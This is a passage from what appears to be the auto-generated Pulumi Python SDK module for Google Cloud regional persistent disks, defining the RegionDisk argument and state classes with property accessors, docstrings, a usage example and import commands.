* `https://www.googleapis.com/compute/v1/projects/project/global/snapshots/snapshot`
* `projects/project/global/snapshots/snapshot`
* `global/snapshots/snapshot`
* `snapshot`
:param pulumi.Input['RegionDiskSourceSnapshotEncryptionKeyArgs'] source_snapshot_encryption_key: The customer-supplied encryption key of the source snapshot. Required
if the source snapshot is protected by a customer-supplied encryption
key.
Structure is documented below.
:param pulumi.Input[str] type: URL of the disk type resource describing which disk type to use to
create the disk. Provide this when creating the disk.
"""
pulumi.set(__self__, "replica_zones", replica_zones)
if description is not None:
pulumi.set(__self__, "description", description)
if disk_encryption_key is not None:
pulumi.set(__self__, "disk_encryption_key", disk_encryption_key)
if interface is not None:
warnings.warn("""This field is no longer in use, disk interfaces will be automatically determined on attachment. To resolve this issue, remove this field from your config.""", DeprecationWarning)
pulumi.log.warn("""interface is deprecated: This field is no longer in use, disk interfaces will be automatically determined on attachment. To resolve this issue, remove this field from your config.""")
if interface is not None:
pulumi.set(__self__, "interface", interface)
if labels is not None:
pulumi.set(__self__, "labels", labels)
if name is not None:
pulumi.set(__self__, "name", name)
if physical_block_size_bytes is not None:
pulumi.set(__self__, "physical_block_size_bytes", physical_block_size_bytes)
if project is not None:
pulumi.set(__self__, "project", project)
if region is not None:
pulumi.set(__self__, "region", region)
if size is not None:
pulumi.set(__self__, "size", size)
if snapshot is not None:
pulumi.set(__self__, "snapshot", snapshot)
if source_snapshot_encryption_key is not None:
pulumi.set(__self__, "source_snapshot_encryption_key", source_snapshot_encryption_key)
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="replicaZones")
def replica_zones(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
URLs of the zones where the disk should be replicated to.
"""
return pulumi.get(self, "replica_zones")
@replica_zones.setter
def replica_zones(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "replica_zones", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
An optional description of this resource. Provide this property when
you create the resource.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="diskEncryptionKey")
def disk_encryption_key(self) -> Optional[pulumi.Input['RegionDiskDiskEncryptionKeyArgs']]:
"""
Encrypts the disk using a customer-supplied encryption key.
After you encrypt a disk with a customer-supplied key, you must
provide the same key if you use the disk later (e.g. to create a disk
snapshot or an image, or to attach the disk to a virtual machine).
Customer-supplied encryption keys do not protect access to metadata of
the disk.
If you do not provide an encryption key when creating the disk, then
the disk will be encrypted using an automatically generated key and
you do not need to provide a key to use the disk later.
Structure is documented below.
"""
return pulumi.get(self, "disk_encryption_key")
@disk_encryption_key.setter
def disk_encryption_key(self, value: Optional[pulumi.Input['RegionDiskDiskEncryptionKeyArgs']]):
pulumi.set(self, "disk_encryption_key", value)
@property
@pulumi.getter
def interface(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the disk interface to use for attaching this disk, which is either SCSI or NVME. The default is SCSI.
"""
return pulumi.get(self, "interface")
@interface.setter
def interface(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "interface", value)
@property
@pulumi.getter
def labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Labels to apply to this disk. A list of key->value pairs.
"""
return pulumi.get(self, "labels")
@labels.setter
def labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "labels", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the resource. Provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with
RFC1035. Specifically, the name must be 1-63 characters long and match
the regular expression `a-z?` which means the
first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last
character, which cannot be a dash.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="physicalBlockSizeBytes")
def physical_block_size_bytes(self) -> Optional[pulumi.Input[int]]:
"""
Physical block size of the persistent disk, in bytes. If not present
in a request, a default value is used. Currently supported sizes
are 4096 and 16384, other sizes may be added in the future.
If an unsupported value is requested, the error message will list
the supported values for the caller's project.
"""
return pulumi.get(self, "physical_block_size_bytes")
@physical_block_size_bytes.setter
def physical_block_size_bytes(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "physical_block_size_bytes", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
"""
A reference to the region where the disk resides.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region", value)
@property
@pulumi.getter
def size(self) -> Optional[pulumi.Input[int]]:
"""
Size of the persistent disk, specified in GB. You can specify this
field when creating a persistent disk using the sourceImage or
sourceSnapshot parameter, or specify it alone to create an empty
persistent disk.
If you specify this field along with sourceImage or sourceSnapshot,
the value of sizeGb must not be less than the size of the sourceImage
or the size of the snapshot.
"""
return pulumi.get(self, "size")
@size.setter
def size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "size", value)
@property
@pulumi.getter
def snapshot(self) -> Optional[pulumi.Input[str]]:
"""
The source snapshot used to create this disk. You can provide this as
a partial or full URL to the resource. For example, the following are
valid values:
* `https://www.googleapis.com/compute/v1/projects/project/global/snapshots/snapshot`
* `projects/project/global/snapshots/snapshot`
* `global/snapshots/snapshot`
* `snapshot`
"""
return pulumi.get(self, "snapshot")
@snapshot.setter
def snapshot(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "snapshot", value)
@property
@pulumi.getter(name="sourceSnapshotEncryptionKey")
def source_snapshot_encryption_key(self) -> Optional[pulumi.Input['RegionDiskSourceSnapshotEncryptionKeyArgs']]:
"""
The customer-supplied encryption key of the source snapshot. Required
if the source snapshot is protected by a customer-supplied encryption
key.
Structure is documented below.
"""
return pulumi.get(self, "source_snapshot_encryption_key")
@source_snapshot_encryption_key.setter
def source_snapshot_encryption_key(self, value: Optional[pulumi.Input['RegionDiskSourceSnapshotEncryptionKeyArgs']]):
pulumi.set(self, "source_snapshot_encryption_key", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
URL of the disk type resource describing which disk type to use to
create the disk. Provide this when creating the disk.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@pulumi.input_type
class _RegionDiskState:
def __init__(__self__, *,
creation_timestamp: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
disk_encryption_key: Optional[pulumi.Input['RegionDiskDiskEncryptionKeyArgs']] = None,
interface: Optional[pulumi.Input[str]] = None,
label_fingerprint: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
last_attach_timestamp: Optional[pulumi.Input[str]] = None,
last_detach_timestamp: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
physical_block_size_bytes: Optional[pulumi.Input[int]] = None,
project: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
replica_zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
self_link: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[int]] = None,
snapshot: Optional[pulumi.Input[str]] = None,
source_snapshot_encryption_key: Optional[pulumi.Input['RegionDiskSourceSnapshotEncryptionKeyArgs']] = None,
source_snapshot_id: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None,
users: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
Input properties used for looking up and filtering RegionDisk resources.
:param pulumi.Input[str] creation_timestamp: Creation timestamp in RFC3339 text format.
:param pulumi.Input[str] description: An optional description of this resource. Provide this property when
you create the resource.
:param pulumi.Input['RegionDiskDiskEncryptionKeyArgs'] disk_encryption_key: Encrypts the disk using a customer-supplied encryption key.
After you encrypt a disk with a customer-supplied key, you must
provide the same key if you use the disk later (e.g. to create a disk
snapshot or an image, or to attach the disk to a virtual machine).
Customer-supplied encryption keys do not protect access to metadata of
the disk.
If you do not provide an encryption key when creating the disk, then
the disk will be encrypted using an automatically generated key and
you do not need to provide a key to use the disk later.
Structure is documented below.
:param pulumi.Input[str] interface: Specifies the disk interface to use for attaching this disk, which is either SCSI or NVME. The default is SCSI.
:param pulumi.Input[str] label_fingerprint: The fingerprint used for optimistic locking of this resource. Used internally during updates.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: Labels to apply to this disk. A list of key->value pairs.
:param pulumi.Input[str] last_attach_timestamp: Last attach timestamp in RFC3339 text format.
:param pulumi.Input[str] last_detach_timestamp: Last detach timestamp in RFC3339 text format.
:param pulumi.Input[str] name: Name of the resource. Provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with
RFC1035. Specifically, the name must be 1-63 characters long and match
the regular expression `a-z?` which means the
first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last
character, which cannot be a dash.
:param pulumi.Input[int] physical_block_size_bytes: Physical block size of the persistent disk, in bytes. If not present
in a request, a default value is used. Currently supported sizes
are 4096 and 16384, other sizes may be added in the future.
If an unsupported value is requested, the error message will list
the supported values for the caller's project.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
:param pulumi.Input[str] region: A reference to the region where the disk resides.
:param pulumi.Input[Sequence[pulumi.Input[str]]] replica_zones: URLs of the zones where the disk should be replicated to.
:param pulumi.Input[str] self_link: The URI of the created resource.
:param pulumi.Input[int] size: Size of the persistent disk, specified in GB. You can specify this
field when creating a persistent disk using the sourceImage or
sourceSnapshot parameter, or specify it alone to create an empty
persistent disk.
If you specify this field along with sourceImage or sourceSnapshot,
the value of sizeGb must not be less than the size of the sourceImage
or the size of the snapshot.
:param pulumi.Input[str] snapshot: The source snapshot used to create this disk. You can provide this as
a partial or full URL to the resource. For example, the following are
valid values:
* `https://www.googleapis.com/compute/v1/projects/project/global/snapshots/snapshot`
* `projects/project/global/snapshots/snapshot`
* `global/snapshots/snapshot`
* `snapshot`
:param pulumi.Input['RegionDiskSourceSnapshotEncryptionKeyArgs'] source_snapshot_encryption_key: The customer-supplied encryption key of the source snapshot. Required
if the source snapshot is protected by a customer-supplied encryption
key.
Structure is documented below.
:param pulumi.Input[str] source_snapshot_id: The unique ID of the snapshot used to create this disk. This value identifies the exact snapshot that was used to create
this persistent disk. For example, if you created the persistent disk from a snapshot that was later deleted and
recreated under the same name, the source snapshot ID would identify the exact version of the snapshot that was used.
:param pulumi.Input[str] type: URL of the disk type resource describing which disk type to use to
create the disk. Provide this when creating the disk.
:param pulumi.Input[Sequence[pulumi.Input[str]]] users: Links to the users of the disk (attached instances) in form: project/zones/zone/instances/instance
"""
if creation_timestamp is not None:
pulumi.set(__self__, "creation_timestamp", creation_timestamp)
if description is not None:
pulumi.set(__self__, "description", description)
if disk_encryption_key is not None:
pulumi.set(__self__, "disk_encryption_key", disk_encryption_key)
if interface is not None:
warnings.warn("""This field is no longer in use, disk interfaces will be automatically determined on attachment. To resolve this issue, remove this field from your config.""", DeprecationWarning)
pulumi.log.warn("""interface is deprecated: This field is no longer in use, disk interfaces will be automatically determined on attachment. To resolve this issue, remove this field from your config.""")
if interface is not None:
pulumi.set(__self__, "interface", interface)
if label_fingerprint is not None:
pulumi.set(__self__, "label_fingerprint", label_fingerprint)
if labels is not None:
pulumi.set(__self__, "labels", labels)
if last_attach_timestamp is not None:
pulumi.set(__self__, "last_attach_timestamp", last_attach_timestamp)
if last_detach_timestamp is not None:
pulumi.set(__self__, "last_detach_timestamp", last_detach_timestamp)
if name is not None:
pulumi.set(__self__, "name", name)
if physical_block_size_bytes is not None:
pulumi.set(__self__, "physical_block_size_bytes", physical_block_size_bytes)
if project is not None:
pulumi.set(__self__, "project", project)
if region is not None:
pulumi.set(__self__, "region", region)
if replica_zones is not None:
pulumi.set(__self__, "replica_zones", replica_zones)
if self_link is not None:
pulumi.set(__self__, "self_link", self_link)
if size is not None:
pulumi.set(__self__, "size", size)
if snapshot is not None:
pulumi.set(__self__, "snapshot", snapshot)
if source_snapshot_encryption_key is not None:
pulumi.set(__self__, "source_snapshot_encryption_key", source_snapshot_encryption_key)
if source_snapshot_id is not None:
pulumi.set(__self__, "source_snapshot_id", source_snapshot_id)
if type is not None:
pulumi.set(__self__, "type", type)
if users is not None:
pulumi.set(__self__, "users", users)
@property
@pulumi.getter(name="creationTimestamp")
def creation_timestamp(self) -> Optional[pulumi.Input[str]]:
"""
Creation timestamp in RFC3339 text format.
"""
return pulumi.get(self, "creation_timestamp")
@creation_timestamp.setter
def creation_timestamp(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "creation_timestamp", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
An optional description of this resource. Provide this property when
you create the resource.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="diskEncryptionKey")
def disk_encryption_key(self) -> Optional[pulumi.Input['RegionDiskDiskEncryptionKeyArgs']]:
"""
Encrypts the disk using a customer-supplied encryption key.
After you encrypt a disk with a customer-supplied key, you must
provide the same key if you use the disk later (e.g. to create a disk
snapshot or an image, or to attach the disk to a virtual machine).
Customer-supplied encryption keys do not protect access to metadata of
the disk.
If you do not provide an encryption key when creating the disk, then
the disk will be encrypted using an automatically generated key and
you do not need to provide a key to use the disk later.
Structure is documented below.
"""
return pulumi.get(self, "disk_encryption_key")
@disk_encryption_key.setter
def disk_encryption_key(self, value: Optional[pulumi.Input['RegionDiskDiskEncryptionKeyArgs']]):
pulumi.set(self, "disk_encryption_key", value)
@property
@pulumi.getter
def interface(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the disk interface to use for attaching this disk, which is either SCSI or NVME. The default is SCSI.
"""
return pulumi.get(self, "interface")
@interface.setter
def interface(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "interface", value)
@property
@pulumi.getter(name="labelFingerprint")
def label_fingerprint(self) -> Optional[pulumi.Input[str]]:
"""
The fingerprint used for optimistic locking of this resource. Used internally during updates.
"""
return pulumi.get(self, "label_fingerprint")
@label_fingerprint.setter
def label_fingerprint(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "label_fingerprint", value)
@property
@pulumi.getter
def labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Labels to apply to this disk. A list of key->value pairs.
"""
return pulumi.get(self, "labels")
@labels.setter
def labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "labels", value)
@property
@pulumi.getter(name="lastAttachTimestamp")
def last_attach_timestamp(self) -> Optional[pulumi.Input[str]]:
"""
Last attach timestamp in RFC3339 text format.
"""
return pulumi.get(self, "last_attach_timestamp")
@last_attach_timestamp.setter
def last_attach_timestamp(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "last_attach_timestamp", value)
@property
@pulumi.getter(name="lastDetachTimestamp")
def last_detach_timestamp(self) -> Optional[pulumi.Input[str]]:
"""
Last detach timestamp in RFC3339 text format.
"""
return pulumi.get(self, "last_detach_timestamp")
@last_detach_timestamp.setter
def last_detach_timestamp(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "last_detach_timestamp", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the resource. Provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with
RFC1035. Specifically, the name must be 1-63 characters long and match
the regular expression `a-z?` which means the
first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last
character, which cannot be a dash.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="physicalBlockSizeBytes")
def physical_block_size_bytes(self) -> Optional[pulumi.Input[int]]:
"""
Physical block size of the persistent disk, in bytes. If not present
in a request, a default value is used. Currently supported sizes
are 4096 and 16384, other sizes may be added in the future.
If an unsupported value is requested, the error message will list
the supported values for the caller's project.
"""
return pulumi.get(self, "physical_block_size_bytes")
@physical_block_size_bytes.setter
def physical_block_size_bytes(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "physical_block_size_bytes", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
"""
A reference to the region where the disk resides.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region", value)
@property
@pulumi.getter(name="replicaZones")
def replica_zones(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
URLs of the zones where the disk should be replicated to.
"""
return pulumi.get(self, "replica_zones")
@replica_zones.setter
def replica_zones(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "replica_zones", value)
@property
@pulumi.getter(name="selfLink")
def self_link(self) -> Optional[pulumi.Input[str]]:
"""
The URI of the created resource.
"""
return pulumi.get(self, "self_link")
@self_link.setter
def self_link(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "self_link", value)
@property
@pulumi.getter
def size(self) -> Optional[pulumi.Input[int]]:
"""
Size of the persistent disk, specified in GB. You can specify this
field when creating a persistent disk using the sourceImage or
sourceSnapshot parameter, or specify it alone to create an empty
persistent disk.
If you specify this field along with sourceImage or sourceSnapshot,
the value of sizeGb must not be less than the size of the sourceImage
or the size of the snapshot.
"""
return pulumi.get(self, "size")
@size.setter
def size(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "size", value)
@property
@pulumi.getter
def snapshot(self) -> Optional[pulumi.Input[str]]:
"""
The source snapshot used to create this disk. You can provide this as
a partial or full URL to the resource. For example, the following are
valid values:
* `https://www.googleapis.com/compute/v1/projects/project/global/snapshots/snapshot`
* `projects/project/global/snapshots/snapshot`
* `global/snapshots/snapshot`
* `snapshot`
"""
return pulumi.get(self, "snapshot")
@snapshot.setter
def snapshot(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "snapshot", value)
@property
@pulumi.getter(name="sourceSnapshotEncryptionKey")
def source_snapshot_encryption_key(self) -> Optional[pulumi.Input['RegionDiskSourceSnapshotEncryptionKeyArgs']]:
"""
The customer-supplied encryption key of the source snapshot. Required
if the source snapshot is protected by a customer-supplied encryption
key.
Structure is documented below.
"""
return pulumi.get(self, "source_snapshot_encryption_key")
@source_snapshot_encryption_key.setter
def source_snapshot_encryption_key(self, value: Optional[pulumi.Input['RegionDiskSourceSnapshotEncryptionKeyArgs']]):
pulumi.set(self, "source_snapshot_encryption_key", value)
@property
@pulumi.getter(name="sourceSnapshotId")
def source_snapshot_id(self) -> Optional[pulumi.Input[str]]:
"""
The unique ID of the snapshot used to create this disk. This value identifies the exact snapshot that was used to create
this persistent disk. For example, if you created the persistent disk from a snapshot that was later deleted and
recreated under the same name, the source snapshot ID would identify the exact version of the snapshot that was used.
"""
return pulumi.get(self, "source_snapshot_id")
@source_snapshot_id.setter
def source_snapshot_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source_snapshot_id", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
URL of the disk type resource describing which disk type to use to
create the disk. Provide this when creating the disk.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def users(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Links to the users of the disk (attached instances) in form: project/zones/zone/instances/instance
"""
return pulumi.get(self, "users")
@users.setter
def users(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "users", value)
class RegionDisk(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
disk_encryption_key: Optional[pulumi.Input[pulumi.InputType['RegionDiskDiskEncryptionKeyArgs']]] = None,
interface: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
physical_block_size_bytes: Optional[pulumi.Input[int]] = None,
project: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
replica_zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
size: Optional[pulumi.Input[int]] = None,
snapshot: Optional[pulumi.Input[str]] = None,
source_snapshot_encryption_key: Optional[pulumi.Input[pulumi.InputType['RegionDiskSourceSnapshotEncryptionKeyArgs']]] = None,
type: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Persistent disks are durable storage devices that function similarly to
the physical disks in a desktop or a server. Compute Engine manages the
hardware behind these devices to ensure data redundancy and optimize
performance for you. Persistent disks are available as either standard
hard disk drives (HDD) or solid-state drives (SSD).
Persistent disks are located independently from your virtual machine
instances, so you can detach or move persistent disks to keep your data
even after you delete your instances. Persistent disk performance scales
automatically with size, so you can resize your existing persistent disks
or add more persistent disks to an instance to meet your performance and
storage space requirements.
Add a persistent disk to your instance when you need reliable and
affordable storage with consistent performance characteristics.
To get more information about RegionDisk, see:
* [API documentation](https://cloud.google.com/compute/docs/reference/rest/v1/regionDisks)
* How-to Guides
* [Adding or Resizing Regional Persistent Disks](https://cloud.google.com/compute/docs/disks/regional-persistent-disk)
> **Warning:** All arguments including `disk_encryption_key.raw_key` will be stored in the raw
state as plain-text. [Read more about secrets in state](https://www.pulumi.com/docs/intro/concepts/programming-model/#secrets).
## Example Usage
### Region Disk Basic
```python
import pulumi
import pulumi_gcp as gcp
disk = gcp.compute.Disk("disk",
image="debian-cloud/debian-9",
size=50,
type="pd-ssd",
zone="us-central1-a")
snapdisk = gcp.compute.Snapshot("snapdisk",
source_disk=disk.name,
zone="us-central1-a")
regiondisk = gcp.compute.RegionDisk("regiondisk",
snapshot=snapdisk.id,
type="pd-ssd",
region="us-central1",
physical_block_size_bytes=4096,
replica_zones=[
"us-central1-a",
"us-central1-f",
])
```
## Import
RegionDisk can be imported using any of these accepted formats
```sh
$ pulumi import gcp:compute/regionDisk:RegionDisk default projects/{{project}}/regions/{{region}}/disks/{{name}}
```
```sh
$ pulumi import gcp:compute/regionDisk:RegionDisk default {{project}}/{{region}}/{{name}}
```
```sh
$ pulumi import gcp:compute/regionDisk:RegionDisk default {{region}}/{{name}}
```
```sh
$ pulumi import gcp:compute/regionDisk:RegionDisk default {{name}}
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: An optional description of this resource. Provide this property when
you create the resource.
:param pulumi.Input[pulumi.InputType['RegionDiskDiskEncryptionKeyArgs']] disk_encryption_key: Encrypts the disk using a customer-supplied encryption key.
After you encrypt a disk with a customer-supplied key, you must
provide the same key if you use the disk later (e.g. to create a disk
snapshot or an image, or to attach the disk to a virtual machine).
Customer-supplied encryption keys do not protect access to metadata of
the disk.
If you do not provide an encryption key when creating the disk, then
the disk will be encrypted using an automatically generated key and
you do not need to provide a key to use the disk later.
Structure is documented below.
:param pulumi.Input[str] interface: Specifies the disk interface to use for attaching this disk, which is either SCSI or NVME. The default is SCSI.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: Labels to apply to this disk. A list of key->value pairs.
:param pulumi.Input[str] name: Name of the resource. Provided by the client when the resource is
created. The name must be 1-63 characters long, and comply with
RFC1035. Specifically, the name must be 1-63 characters long and match
the regular expression `a-z?` which means the
first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last
character, which cannot be a dash.
:param pulumi.Input[int] physical_block_size_bytes: Physical block size of the persistent disk, in bytes. If not present
in a request, a default value is used. Currently supported sizes
are 4096 and 16384, other sizes may be added in the future.
If an unsupported value is requested, the error message will list
the supported values for the caller's project.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
:param pulumi.Input[str] region: A reference to the region where the disk resides.
:param pulumi.Input[Sequence[pulumi.Input[str]]] replica_zones: URLs of the zones where the disk should be replicated to.
:param pulumi.Input[int] size: Size of the persistent disk, specified in GB. You can specify this
field when creating a persistent disk using the sourceImage or
sourceSnapshot parameter, or specify it alone to create an empty
persistent disk.
If you specify this field along with sourceImage or sourceSnapshot,
the value of sizeGb must not be less than the size of the sourceImage
or the size of the snapshot.
:param pulumi.Input[str] snapshot: The source snapshot used to create this disk. You can provide this as
a partial or full URL to the resource. For example, the following are
valid values:
* `https://www.googleapis.com/compute/v1/projects/project/global/snapshots/snapshot`
* `projects/project/global/snapshots/snapshot`
* `global/snapshots/snapshot`
* `snapshot`
:param pulumi.Input[pulumi.InputType['RegionDiskSourceSnapshotEncryptionKeyArgs']] source_snapshot_encryption_key: The customer-supplied encryption key of the source snapshot. Required
if the source snapshot is protected by a customer-supplied encryption
key.
Structure is documented below.
:param pulumi.Input[str] type: URL of the disk type resource describing which disk type to use to
create the disk. Provide this when creating the disk.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: RegionDiskArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Persistent disks are durable storage devices that function similarly to
the physical disks in a desktop or a server. Compute Engine manages the
hardware behind these devices to ensure data redundancy and optimize
performance for you. Persistent disks are available as either standard
hard disk drives (HDD) or solid-state drives (SSD).
Persistent disks are located independently from your virtual machine
instances, so you can detach or move persistent disks to keep your data
even after you delete your instances. Persistent disk performance scales
automatically with size, so you can resize your existing persistent disks
or add more persistent disks to an instance to meet your performance and
storage space requirements.
Add a persistent disk to your instance when you need reliable and
affordable storage with consistent performance characteristics.
To get more information about RegionDisk, see:
* [API documentation](https://cloud.google.com/compute/docs/reference/rest/v1/regionDisks)
* How-to Guides
* [Adding or Resizing Regional Persistent Disks](https://cloud.google.com/compute/docs/disks/regional-persistent-disk)
> **Warning:** All arguments including `disk_encryption_key.raw_key` will be stored in the raw
state as plain-text. [Read more about secrets in state](https://www.pulumi.com/docs/intro/concepts/programming-model/#secrets).
## Example Usage
### Region Disk Basic
```python
import pulumi
import pulumi_gcp as gcp
disk = gcp.compute.Disk("disk",
image="debian-cloud/debian-9",
size=50,
type="pd-ssd",
zone="us-central1-a")
snapdisk = gcp.compute.Snapshot("snapdisk",
source_disk=disk.name,
zone="us-central1-a")
regiondisk = gcp.compute.RegionDisk("regiondisk",
snapshot=snapdisk.id,
type="pd-ssd",
region="us-central1",
physical_block_size_bytes=4096,
replica_zones=[
"us-central1-a",
"us-central1-f",
])
```
## Import
RegionDisk can be imported using any of these accepted formats
```sh
$ pulumi import gcp:compute/regionDisk:RegionDisk default projects/{{project}}/regions/{{region}}/disks/{{name}}
```
```sh
$ pulumi import gcp:compute/regionDisk:RegionDisk default {{project}}/{{region}}/{{name}}
```
```sh
$ pulumi import gcp:compute/regionDisk:RegionDisk default {{region}}/{{name}}
```
```sh
$ pulumi import gcp:compute/regionDisk:RegionDisk default {{name}}
```
:param str resource_name: The name of the resource.
:param RegionDiskArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(RegionDiskArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
disk_encryption_key: Optional[pulumi.Input[pulumi.InputType['RegionDiskDiskEncryptionKeyArgs']]] = None,
interface: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
physical_block_size_bytes: Optional[pulumi.Input[int]] = None,
project: Optional[pulumi.Input[str]] = None,
region: Optional[pulumi.Input[str]] = None,
replica_zones: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
size: Optional[pulumi.Input[int]] = None,
snapshot: Optional[pulumi.Input[str]] = None,
source_snapshot_encryption_key: Optional[pulumi.Input[pulumi.InputType['RegionDiskSourceSnapshotEncryptionKeyArgs']]] = None,
type: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = RegionDiskArgs.__new__(RegionDiskArgs)
__props__.__dict__["description"] = description
__props__.__dict__["disk_encryption_key"] = disk_encryption_key
if interface is not None and not opts.urn:
warnings.warn("""This field is no longer in use, disk interfaces will be automatically determined on attachment. To resolve this issue, remove this field from your config.""", DeprecationWarning)
pulumi.log.warn("""interface is deprecated: This field is no longer in use, disk interfaces will be automatically determined on attachment. To resolve this issue, remove this field from your config.""")
__props__.__dict__["interface"] = interface
__props__.__dict__["labels"] = labels
